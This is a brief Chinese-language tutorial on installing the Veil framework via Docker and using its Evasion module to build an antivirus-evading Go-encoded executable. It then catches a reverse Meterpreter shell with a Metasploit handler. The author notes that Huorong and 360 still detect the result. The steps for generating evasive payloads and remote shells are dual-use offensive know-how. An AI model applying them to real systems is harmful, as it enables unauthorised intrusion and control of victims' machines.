-
安装veil
使用docker部署:
拉取镜像:docker pull mattiasohlsson/veil 执行启动命令:docker run -it -v /tmp/veil-output:/var/lib/veil/output:Z mattiasohlsson/veil
成功即可出现如下图片:
之后再进⼊镜像可以在启动镜像后使⽤下⾯命令
dk exec -it 4ae72dc914c9 /bin/bash
-
veil简单使用
veil有两个免杀的⼯具,Evasion和Ordnance。 Ordnance可⽣成在Veil-Evasion中使⽤的shellcode,Evasion是⽤做⽂件免杀。
我们⼀般选择
Evasion Veil>: use 1 #选择Evasion功能
Veil/Evasion>: list #查看payload列
可以看见有41个payload
推荐使⽤以go和ruby语⾔encode的编码⽅式。
use 16
设置msf监听的地址和端口
输入generate跳转至输入该木马的名字
回车及可在/tmp/veil-output/compiled/路径下看见生成的go.exe
启动msf使用/exploit/mutil/handile
使用模块payload windows/meterpreter/reverse_tcp可成功获取meterpreter(其余payload发现无效。。。。)
但是火绒、360等均可检测出